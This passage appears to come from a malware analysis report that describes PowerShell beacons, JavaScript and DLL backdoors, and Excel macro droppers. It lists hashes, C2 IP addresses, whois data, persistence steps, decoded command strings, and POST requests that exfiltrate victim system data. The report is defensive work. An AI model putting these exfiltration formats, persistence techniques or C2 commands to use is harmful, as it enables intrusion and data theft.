No matches found.

ssdeep Matches

No matches found.

Relationships
255e53af8b... Connected_To 185.183.96.44
Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]183[.]96[.]44

--End C2 IP address--



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

185.183.96.44

Tags

command-and-control

Ports
  • 443 TCP
Whois

Queried whois.ripe.net with "-B 185.183.96.44"...



% Information related to '185.183.96.0 - 185.183.96.255'



% Abuse contact for '185.183.96.0 - 185.183.96.255' is 'abuse@hostsailor.com'



inetnum:        185.183.96.0 - 185.183.96.255

netname:        EU-HOSTSAILOR

descr:         HostSailor NL Services

country:        NL

admin-c:        AA31720-RIPE

tech-c:         AA31720-RIPE

status:         ASSIGNED PA

mnt-by:         MNT-HS

created:        2016-12-23T09:52:06Z

last-modified: 2016-12-23T09:52:06Z

source:         RIPE



person:         Ali Al-Attiyah

address:        Suite No: 1605, Churchill Executive Tower, Burf Khalifa Area

address:        Dubai P.O. Box 98362

address:        United Arab Emirates

phone:         +971 455 77 845

nic-hdl:        AA31720-RIPE

mnt-by:         MNT-HS

created:        2016-12-21T19:19:26Z

last-modified: 2019-03-18T14:07:12Z

source:         RIPE



% Information related to '185.183.96.0/24AS60117'



route:         185.183.96.0/24

descr:         EU-HOSTSAILOR 185.183.96.0/24

origin:         AS60117

mnt-by:         MNT-HS

created:        2016-12-23T09:50:04Z

last-modified: 2016-12-23T09:50:04Z

source:         RIPE

Relationships
185.183.96.44 Connected_From 255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a
Description

TeresitaJordain_config.txt (255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a) attempts to connect to this IP address.

e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca

Details
Name HeidieLeone.txt
Size 706 bytes
Type ASCII text, with very long lines, with no line terminators
MD5 d68f5417f1d4fc022067bf0313a3867d
SHA1 2f6dd6d11e28bf8b4d7ceec8753d15c7568fb22e
SHA256 e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca
SHA512 39023583902e616a196357a69ab31371842f3b6119914803b19e62388dc873ab02567ac398148f84c68adac6228a8cb4e83afb0be24bdf1603a618669030bf39
ssdeep 12:B6V3vKH/RRNyzV3vowKzV3voDPMV3v7SzV3vHzvm5V3vWQ52LgxxOWpgVEQgjVoL:sV3E/ozV3pKzV3GPMV3OzV3j4V3OQ4sI
Entropy 5.145602
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
e7f6c7b91c... Connected_To 185.117.75.34
Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]117[.]75[.]34

--End C2 IP address--



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c

Tags

trojan

Details
Name note.js
Size 3235 bytes
Type ASCII text, with very long lines, with CRLF line terminators
MD5 c0c2cd5cc018e575816c08b36969c4a6
SHA1 47a4e0d466bb20cec5d354e56a9aa3f07cec816a
SHA256 b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c
SHA512 4b930da1435a72095badaeca729baca8d6af9ab57607e01bd3dd1216eee75c8f8b7981a92640d475d908c6f22811900133aed8ab8513c38f5bc82b60752bf929
ssdeep 96:/r9/hIgY/5N8s2Q5bQRWs4uQ5WQRWumVxE1Fq:T9/hILLdpG4Rdmwq
Entropy 5.200319
Antivirus
NANOAV Trojan.Script.Heuristic-js.iacgm
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
b1e30cce6d... Connected_To 185.118.164.21
Description

This file is a JavaScript file that contains a PowerShell beacon for a GET request to:



--Begin GET request--

185[.]118[.]164[.]21:80/index?param=<computer_name>/<username>

--End GET request--



The JavaScript is launched using the native file “WScript.exe” where the file also creates persistence by copying itself to the user’s Contacts folder and creating a Scheduled Task to relaunch the PowerShell script daily at 10:01. The manifestation function shows the parameters used to build the GET request to 185[.]118[.]164[.]21 and the scheduled task (Figure 7 and Figure 8).



As a persistence mechanism, the manifestation function also copies the file to the User’s Contacts folder, and sets a Scheduled Task to recur daily at 10:01 AM, which would relaunch the PowerShell beacon to 185[.]118[.]164[.]213 (Figure 9).

Screenshots

Figure 7 - Screenshot of the main code for the JavaScript.

Figure 8a - Screenshot of the network beacon.

Figure 8b - Screenshot of the network beacon.

Figure 9 - Screenshot of the malware creating a task.

Figure 10a - Screenshot of the command being executed.

Figure 10b - Screenshot of the command being executed.

185.118.164.21

Tags

command-and-control

URLs
  • 185.118.164.21/index?param=<computer_name>/<username>
Ports
  • 80 TCP
Whois

Queried whois.ripe.net with "-B 185.118.164.21"...



% Information related to '185.118.164.0 - 185.118.165.255'



% Abuse contact for '185.118.164.0 - 185.118.165.255' is 'abuse@profitserver.ru'



inetnum:        185.118.164.0 - 185.118.165.255

netname:        RU-CHELYABINSK-SIGNAL-20150923

country:        RU

admin-c:        AN29881-RIPE

tech-c:         AN29881-RIPE

status:         ASSIGNED PA

mnt-by:         ru-chelyabinsk-signal-1-mnt

created:        2016-10-12T10:22:21Z

last-modified: 2016-10-12T10:22:21Z

source:         RIPE



person:         Alexey Nevolin

address:        Ordzhonikidze str., 54-B

address:        454091

address:        Chelyabinsk

address:        RUSSIAN FEDERATION

phone:         +7 3517299971

nic-hdl:        AN29881-RIPE

mnt-by:         ru-chelyabinsk-signal-1-mnt

created:        2015-09-18T15:23:57Z

last-modified: 2015-09-18T15:23:58Z

source:         RIPE



% Information related to '185.118.164.0/24AS44493'



route:         185.118.164.0/24

descr:         Chelyabinsk-Signal

origin:         AS44493

mnt-by:         ru-chelyabinsk-signal-1-mnt

created:        2015-11-17T05:53:42Z

last-modified: 2015-11-17T05:53:42Z

source:         RIPE

Relationships
185.118.164.21 Connected_From b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c
185.118.164.21 Connected_From 42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986
Description

note.js (b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c) and rj.js (42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986) connected to this IP address.

42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986

Tags

backdoor

Details
Name rj.js
Size 5257 bytes
Type ASCII text, with very long lines
MD5 37fa9e6b9be7242984a39a024cade2d5
SHA1 0211569091b96cffab6918e18ccc97f4b24d88d4
SHA256 42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986
SHA512 889f293af25aa3af14c580000f15ade58e5b6b6000f42ddf38b69fd74a663b4c92cc2a90bfc9804d9de194e1eeee734f0b9e0ea5838afbc09f6fa3bfb3f5891c
ssdeep 96:ub0werybmdzpcY3EUCGYZoTuEDdEyh8G2ng7qci1yMA1h5+N:ub09ymdzpcY3BOZIDmyh8G2ntci1P856
Entropy 5.422642
Antivirus
Emsisoft JS.Heur.Backdoor.2.BA440290.Gen (B)
Lavasoft JS.Heur.Backdoor.2.BA440290.Gen
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
42ca7d3fcd... Connected_To 185.118.164.21
Description

This file is a heavily obfuscated JavaScript with encoded values which contains a PowerShell beacon for a GET request to:



--Begin GET request--

185[.]118[.]164[.]21:80/index?param=<computer_name>/<username>

--End GET Request--



This file performs the same tasks as "note.js" (b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c) and is launched using the native file “WScript.exe” where the rj.js gains persistence by copying itself to the user’s Contacts folder and creating a Scheduled Task to relaunch the PowerShell script daily at 10:01 AM.

3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8

Tags

backdoor

Details
Name FML.dll
Size 210397496 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 0431445d6d6e5802c207c8bc6a6402ea
SHA1 3765c1ad8a1d936aad88255aef5d6d4ce24f94e8
SHA256 3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8
SHA512 f46d71a66aa615efdcec37ff282201695f6216a8903a83edee874ced321b8a090baf1054e77bd3ed642e5da60522ea245e1741726fc4b49ccbef11203f5790bf
ssdeep 3145728:LFiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiY:AQyQyQyQyQyQyQyQyQyQyQyQyY
Entropy 7.999913
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-01-20 09:19:24-05:00
Import Hash 3bcc46e3f517ddf9666020895796153f
PE Sections
MD5 Name Raw Size Entropy
fea26576aaf64f90e067892d07fb8f97 header 1024 3.335479
11cc597cf11ee87c3a0f76dcecf7556a .text 468992 6.420810
52f5c458bae1ec48fc650d0975663910 .rdata 167936 4.843554
f7a88a7f326a63079052f1884b57e3a8 .data 11264 4.040157
c2b5de9421b4a0c9b7d4688f4ae051ac .pdata 25088 5.777552
1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393
37b679e67208f1af8eed89301450017a .rsrc 209716224 8.000000
ef43c49686a0f7100f95a3dfa50d84ea .reloc 5120 5.322063
Description

This file has been identified as a Mori Backdoor. The file is a DLL written in C++ that is executed with regsvr32.exe with export DllRegisterServer and appears to be a component to another program. FML.dll contains approximately 200MB of junk in a resource directory 205, number 105. Upon execution, FML.dll creates a mutex: 0x50504060 and performs the following tasks:



- Deleting the file FILENAME.old and deleting file by registry value. The filename is the DLL file with a .old extension (Figure 13).

- The sample resolves networking APIs from strings that are ADD-encrypted with the key 0x05.

- The sample uses Base64 and JSON based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.

- For C2 communication, the sample uses HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag.

- Reading and/or writing data from the following Registry Keys, HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default)

(See Figure 14).

Screenshots

Figure 11 - Screenshot of the mutex.

Figure 12 - Screenshot of the exports.

Figure 13 - Screenshot of the malware deleting the file FILENAME.old and deleting the file by registry value.

Figure 14 - Screenshot of the deleted Registry Keys.

026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141

Tags

downloaderdropperloadertrojan

Details
Name Cooperation terms.xls
Size 252928 bytes
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: pc, Last Saved By: interstellar, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Sep 29 20:38:56 2021, Last Saved Time/Date: Mon Oct 4 07:32:17 2021, Security: 0
MD5 b0ab12a5a4c232c902cdeba421872c37
SHA1 a8e7659942cc19f422678181ee23297efa55fa09
SHA256 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
SHA512 c1ff4c3bd44e66e45cdb66b818a963d641cde6b9ea33ac64374929f182cd09e944d9337a588ba99d3df98190ba979431d015d848aa09c2d93763a1ed795ff304
ssdeep 6144:Lk3hOdsylKlgryzc4bNhZF+E+W2knAcYi4uU4pVZ8lx+tSeJBWC:5iLZpVZ8lx+tn3WC
Entropy 7.167960
Antivirus
Antiy Trojan[Downloader]/MSOffice.Agent.pmk
Bitdefender Trojan.Generic.30623170
ESET VBS/Agent.PMK trojan
Emsisoft Trojan.Generic.30623170 (B)
IKARUS Trojan.VBS.Agent
Lavasoft Trojan.Generic.30623170
McAfee RDN/Sagent
NANOAV Trojan.Ole2.Vbs-heuristic.druvzi
Quick Heal X97M.Trojan.Agent.45255
Sophos Troj/DocDl-AEVH
Symantec Trojan.Mdropper
Trend Micro Possibl.564B8E70
Trend Micro HouseCall Possibl.564B8E70
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
026868713d... Dropped c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
026868713d... Dropped f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
Description

This artifact is a malicious Excel file that contains macros written in Visual Basic for Applications (VBA) and two encoded wsf files. When the Excel file is opened, the victim will be prompted to enable macros with the “Enable Content” button. The macros are executed once the victim enables content. When executed, the macros decode and install the embedded wsf files into the directories below:



--Begin files--

"%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf"

"C:\ProgramData\Outlook.wsf "

--End files--

Screenshots

Figure 15 - The contents of the Excel file.

Figure 16 - The contents of the macros used to decode and install the embedded wsf files on the compromised system.

c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e

Tags

downloaderloadertrojan

Details
Name Outlook.wsf
Size 11692 bytes
Type HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5 e182a861616a9f12bc79988e6a4186af
SHA1 69840d4c4755cdab01527eacbb48577d973f7157
SHA256 c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
SHA512 0eb88fe297d296569063874bead48c8b2998edc6779f5777f533de241fa49d7cb4aadc189bcdd07783ad2d669ac35344b2385c62859bc5b0c6fbe55e4857002b
ssdeep 192:qK8Lkrc2HWT1jbAaBLGFNN68RNEFQQrrl+lBAlJlgQGtb0UqQYGQrQoGuQgQXPY5:qK82ZWTd/LYNBRNEFl+l2lJlGdPUlcKp
Entropy 4.062618
Path %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf
Antivirus
Avira VBS/Dldr.Agent.HC
Bitdefender Trojan.Generic.31341871
ESET VBS/Agent.PMK trojan
Emsisoft Trojan.Generic.31341871 (B)
IKARUS Trojan.VBS.Agent
Lavasoft Trojan.Generic.31341871
McAfee VBS/Agent.hw
Quick Heal VBS.Downloader.45256
Sophos Troj/HTA-AB
Symantec VBS.Downloader.Trojan
Trend Micro TROJ_FR.A1B65C22
Trend Micro HouseCall TROJ_FR.A1B65C22
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
c2badcdfa9... Dropped_By 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
Description

This artifact is a wsf file installed by Cooperation terms.xls (026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141). This file is installed into the current user startup folder to run automatically at startup. The file contains hexadecimal (hex)-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decode these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

"okppQO4Hbr0n3PBQt78IQhFQlIvXjWRu.run PprJwVD1jVboW9s2WjL9uCH1Jk02tisB,0,TRUE"

"cmd.exe /c cscript.exe %ProgramData%\\Outlook.wsf jaguar_plus"

--End strings--



It executes the command below to run the wsf file "%ProgramData%\Outlook.wsf" (f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0) with the argument "jaguar_plus".



Displayed below is the command:



--Begin command--

"cmd.exe /c cscript.exe %ProgramData%\\Outlook.wsf jaguar_plus"

--End command--

Screenshots

Figure 17 - The contents of the VBscript.

f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0

Tags

downloaderloadertrojan

Details
Name Outlook.wsf
Size 34242 bytes
Type HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 b3504546810e78304e879df76d4eec46
SHA1 d02d93b707ac999fde0545792870a2b82dc3a238
SHA256 f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
SHA512 d7a78259988e17b1487a3cc2a3a8ba7aaa1cae8904b2ee3da79a6a77266822f726a367cda9c1b59aab3cf369ebf5bec1f279e8e6ff036376073f8a20e3053576
ssdeep 384:NaeE4zZlbO1/RW8upzK2Hkq3+LBOuCBSnUosLCFt9tMRYCnFCg+tJCXw2V3:NaeEpu9VEU+LQEsMt9tUl+ta
Entropy 3.699753
Path C:\ProgramData\Outlook.wsf
Antivirus
Avira JS/Dldr.Agent.bah
IKARUS JS.Trojan-Downloader.Agent
McAfee VBS/Downloader.aak
NANOAV Trojan.Script.Vbs-heuristic.druvzi
Quick Heal VBS.Downloader.45256
Sophos Troj/HTA-AB
Symantec Trojan Horse
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
f10471e15c... Dropped_By 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
f10471e15c... Connected_To 88.119.170.124
Description

This artifact is a wsf file installed by Cooperation terms.xls (026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141) and executed by Outlook.wsf (c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e). The file contains hex-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decodes these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

{impersonationLevel=impersonate}!\\\\

%AppData%\\Local\\Temp\\h.txt

ezedcjrfvjriftmldedu

lcekcnkxkbllmwlpoklgof

http[:]//88[.]119[.]170[.]124/

POST

E442779124B3E37D2A3F77D77B66A.Open H9C223C34C88AD14FAD121E5E9C968,FFCC6585A837E41D4D73CB795EA25,False"

E442779124B3E37D2A3F77D77B66A.send H9C223C34C88AD14FAD121E5E9C968"

cmd.exe /c

>> %temp%\\h.txt

Select * from Win32_IP4RouteTable

"%COMPUTERNAME%"

"%USERNAME%"

--End strings--



It collects the victim's system IP address, computer name, and username in the format below:



--Begin information--

Format: [victim's system Internet Protocol address]|#@*@#|[Computer name]/Username

Sample: "19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01"

--End information--



The collected data above is hex-encoded, and the hex bytes are reshuffled and appended to a string "vl" before exfiltration. It will send the encoded data using the Uniform Resource Identifier (URI): "http[:]//88[.]119[.]170[.]124/ezedcjrfvjriftmldedu" and wait for a response.



Displayed below is the POST request used to exfiltrate the victim's system data:



--Begin request--

POST /ezedcjrfvjriftmldedu HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 93

Host: 88[.]119[.]170[.]124



vl=1693273632E6349334E37235340D743442D53463ED34C7CC2214A90423C5494228E4F7032293856253E6216713

--End request---



The response payload was not available for analysis. Analysis indicates that the C2 response payloads are hex encoded and reshuffled. It uses the same built-in algorithm to arrange and hex decode these payloads, which contain command-line scripts. The malware will search for the string "|#@*@#|" or "/!*##*!/" in the decoded payload. If the payload contains one of these strings, it will parse the command-line scripts for execution using the command below:



--Begin command--

"cmd.exe /c [decoded command scripts]| >> %temp%\\h.txt"

--End command--



The output of the command-line scripts executed is stored into a text file "%temp%\h.txt". It reads the output of the command executed from the text file "%temp%\h.txt" and attaches it to the victim's system IP address, computer name, and username in the format below:



--Begin format--

Format: "[victim's system Internet Protocol address]|#@*@#|[Computer name]/Username|#@*@#|[Output of the command executed]"



Sample observed: "19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01|#@*@#|\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter Local Area Connection 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Link-local IPv6 Address . . . . . : fe80::d1d7:d838:2959:23d0%15\r\n IPv4 Address. . . . . . . . . . . : 19x.1xx.2xx.1xx\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 19x.1xx.2xx.2xx\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter isatap.{62D6C817-FD7E-4634-83CF-3311F44F4490}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n Connection-specific DNS Suffix . : \r\n IPv6 Address. . . . . . . . . . . : 2001:0:c000:27b:c2f:3a2f:3f57:2e63\r\n Link-local IPv6 Address . . . . . : fe80::c2f:3a2f:3f57:2e63%12\r\n Default Gateway . . . . . . . . . : ::\r\n\r\nTunnel adapter isatap.{43E8EDE4-433A-453E-B583-1A994D8B33E2}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n"

--End format--



The above victim's system's information and the output command data are hex-encoded, and the hex bytes are re-ordered and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//88[.]119[.]170[.]124/lcekcnkxkbllmwlpoklgof" and wait for a response (next command).



Displayed below is the POST request used to exfiltrate the victim's system data and the output of the command executed:



--Begin request--

POST /lcekcnkxkbllmwlpoklgof HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 9813

Host: 88[.]119[.]170[.]124



vl=[re-ordered hex-encoded victim's system data and the output of the command executed]

--End request---



Displayed below is sample POST request that contains the encoded victim's system data and the output of the command executed:



--Begin request--

POST /lcekcnkxkbllmwlpoklgof HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 5689

Host: 88[.]119[.]170[.]124



vl=A093273633E2339332927232320A723242D6E6D346365E7226F466E77467273E265674D6469267477C024204601063744215623203A2E202224279426216621227E262052222240296E426262......F0E20702E4A2D2E2DAE2E29240A22252E99265D2F0320602900234705142E5F477A2F2C63066A2027EC2122220524492D8F230420F2397E6CEC225648F56E59600C63706AE0604C4410625E607022202856253E521D013

--End request---



It is designed to send these messages below to the C2 server using the URI: "http[:]//88[.]119[.]170[.]124/lcekcnkxkbllmwlpoklgof". Each message sent is hex-encoded, and the hex bytes are re-ordered and appended to a string "vl":



--Begin message format--

"200/!*##*!/19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01" ==> When the decoded C2 command data received contains the string "|#@*@#|" or "/!*##*!/".

"19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01|#@*@#|sory" ==> When a command or a specific task fails

--End message format--

Screenshots

Figure 18 - The contents of the VBscript.

88.119.170.124

Tags

command-and-control

HTTP Sessions
  • POST /ezedcjrfvjriftmldedu HTTP/1.1

    Connection: Keep-Alive

    Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

    Accept: */*

    Accept-Language: en-us

    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

    CharSet: UTF-8

    Content-Length: 93

    Host: 88.119.170.124
  • POST /lcekcnkxkbllmwlpoklgof HTTP/1.1

    Connection: Keep-Alive

    Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

    Accept: */*

    Accept-Language: en-us

    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

    CharSet: UTF-8

    Content-Length: 9813

    Host: 88.119.170.124
Whois

Domain Name: bacloud.info

Registry Domain ID: 9ae51aee8f3144059e17d8f8fba3095e-DONUTS

Registrar WHOIS Server: whois.PublicDomainRegistry.com

Registrar URL: http://www.PublicDomainRegistry.com

Updated Date: 2021-03-09T06:39:04Z

Creation Date: 2010-04-22T12:46:58Z

Registry Expiry Date: 2022-04-22T12:46:58Z

Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com

Registrar IANA ID: 303

Registrar Abuse Contact Email: abuse@publicdomainregistry.com

Registrar Abuse Contact Phone: +91.2230797500

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Registry Registrant ID: REDACTED FOR PRIVACY

Registrant Name: REDACTED FOR PRIVACY

Registrant Organization: GDPR Masked

Registrant Street: REDACTED FOR PRIVACY

Registrant City: REDACTED FOR PRIVACY

Registrant State/Province: GDPR Masked

Registrant Postal Code: REDACTED FOR PRIVACY

Registrant Country: US

Registrant Phone: REDACTED FOR PRIVACY

Registrant Phone Ext: REDACTED FOR PRIVACY

Registrant Fax: REDACTED FOR PRIVACY

Registrant Fax Ext: REDACTED FOR PRIVACY

Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

Registry Admin ID: REDACTED FOR PRIVACY

Admin Name: REDACTED FOR PRIVACY

Admin Organization: REDACTED FOR PRIVACY

Admin Street: REDACTED FOR PRIVACY

Admin City: REDACTED FOR PRIVACY

Admin State/Province: REDACTED FOR PRIVACY

Admin Postal Code: REDACTED FOR PRIVACY

Admin Country: REDACTED FOR PRIVACY

Admin Phone: REDACTED FOR PRIVACY

Admin Phone Ext: REDACTED FOR PRIVACY

Admin Fax: REDACTED FOR PRIVACY

Admin Fax Ext: REDACTED FOR PRIVACY

Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

Registry Tech ID: REDACTED FOR PRIVACY

Tech Name: REDACTED FOR PRIVACY

Tech Organization: REDACTED FOR PRIVACY

Tech Street: REDACTED FOR PRIVACY

Tech City: REDACTED FOR PRIVACY

Tech State/Province: REDACTED FOR PRIVACY

Tech Postal Code: REDACTED FOR PRIVACY

Tech Country: REDACTED FOR PRIVACY

Tech Phone: REDACTED FOR PRIVACY

Tech Phone Ext: REDACTED FOR PRIVACY

Tech Fax: REDACTED FOR PRIVACY

Tech Fax Ext: REDACTED FOR PRIVACY

Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

Name Server: dns1.laisvas.lt

Name Server: ns3.laisvas.lt

Name Server: ns5.laisvas.lt

DNSSEC: unsigned

URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

>>> Last update of WHOIS database: 2022-02-01T10:54:20Z <<

Relationships
88.119.170.124 Connected_From f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
Description

The malware C2 IP address.

4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c

Tags

downloaderdropperloadertrojan

Details
Name ZaibCb15Ak.xls
Size 254976 bytes
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Nov 1 07:15:30 2021, Last Saved Time/Date: Mon Nov 1 07:17:43 2021, Security: 0
MD5 6cef87a6ffb254bfeb61372d24e1970a
SHA1 e21d95b648944ad2287c6bc01fcc12b05530e455
SHA256 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
SHA512 a99ca0f86da547d2979bd854b29824da77472b16aa2d2dcbc0e5c3eb4b488ae69f9d3006bc326b52b9145076247b64ba55cacfaaf30e417ea8d4f71447d682aa
ssdeep 6144:8k3hOdsylKlgryzc4bNhZF+E+W2knArYi4uU4pVZ8lx+tSea4awSi:PiLZpVZ8lx+tna4TZ
Entropy 7.232043
Antivirus
Antiy Trojan[Downloader]/MSOffice.Agent.gho
Avira W97M/Hancitor.tnvir
Bitdefender Trojan.Generic.31220507
ESET a variant of Generik.GHODWTC trojan
Emsisoft Trojan.Generic.31220507 (B)
IKARUS Trojan.SuspectCRC
Lavasoft Trojan.Generic.31220507
McAfee RDN/Woreflint
NANOAV Trojan.Ole2.Vbs-heuristic.druvzi
NETGATE Trojan.Win32.Malware
Quick Heal Ole.Trojan.A3288643
Sophos Troj/DocDl-AEVH
Symantec Trojan.Mdropper
Trend Micro Trojan.E78080B2
Trend Micro HouseCall Trojan.E78080B2
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
4b2862a166... Contains d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
4b2862a166... Contains ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
Description

This artifact is a malicious Excel file that contains macros written in VBA and two encoded wsf files. When the Excel file is opened, the victim will be prompted to enable macros with the “Enable Content” button. The macros are executed once the victim enables content. When executed, the macros decode and install the embedded wsf files into the directories below:



--Begin files--

"%LocalAppData\Outlook.wsf"

"%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf"

--End files--

Screenshots

Figure 19 - The contents of the Excel file.

ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418

Details
Name Outlook.wsf
Size 11980 bytes
Type HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5 e1f97c819b1d26748ed91777084c828e
SHA1 4209a007fcf4d4913afad323eb1d1ae466f911a6
SHA256 ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
SHA512 8a98999bc6ff4094b5e1d795e32345aca4e70b8e91ad1e4ba3f6ec6dabcf5591dc5c9740e6c326b23c6120b847611006d86e56dd2590ce30cf76eb076723f477
ssdeep 192:/LsEDuNb8pWGNm91llKk8YwB4o6N8M6sBISa9FE8mJSZbHCExZ9EEFaeYuan:zsquN4K/aHYa42saSstmJSZbxZLK
Entropy 4.063463
Path %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
ed988768f5... Contained_Within 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
Description

